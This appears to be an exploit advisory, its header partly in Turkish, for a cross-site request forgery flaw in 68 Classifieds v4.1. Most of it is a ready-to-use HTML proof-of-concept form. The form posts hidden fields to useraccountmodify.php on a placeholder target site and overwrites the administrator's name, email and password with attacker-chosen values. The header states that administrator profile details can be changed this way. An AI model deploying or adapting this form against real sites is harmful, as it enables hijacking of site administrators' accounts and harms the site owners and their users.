< ------------------- header data start ------------------- >


#############################################################

# Application Name : 68 Classifieds

# Vulnerable Type : XSRF

# Infection : Administrator Profile Bilgileri Change Edilebilir.

# author : CWCaspeR - Bug Researchers

# Demo : http://demo.68classifieds.com/v4.1/useraccountmodify.php

#############################################################


< ------------------- header data end of ------------------- >

<form action=http://HEDEFSITE.com/SCRIPTYOLU/useraccountmodify.php id=form name=login method=POST>
<input class=required name=firstname type=hiddent id=firstname value=admin size=35 />
<input class=required name=lastname type=hidden id=lastname value=admin size=35 />
<input class=required name=address type=hidden id=address value=123 My Street size=35 />
<input class=required name=city type=hidden id=city value=Belmont size=35 />
<input type=hidden name=state value=Alabama>
<input type=hidden name=country value=Canada>
<input class=required name=zip type=hidden id=zip value=28012 size=35 />
<input class=required name=phone type=hidden id=phone value=7048251111 size=35 />
<input name=email class=required email type=hidden id=email value=[email protected] size=35 />
<input name=emailconfirm type=hidden equalTo=#email id=emailconfirm value= size=35 />
<input type=hidden id=newsletter name=newsletter value=Y />
<input name=password type=hidden id=password size=35 value=SIFRENIZ />
<input name=passwordconfirm equalTo=#password type=hidden id=passwordconfirm size=35 value=SIFRENIZ />
<input name=action type=hidden id=action value=modify />
<input name=submit type=submit id=submit value=buTONADI />
</form>

< -- bug code end of -- >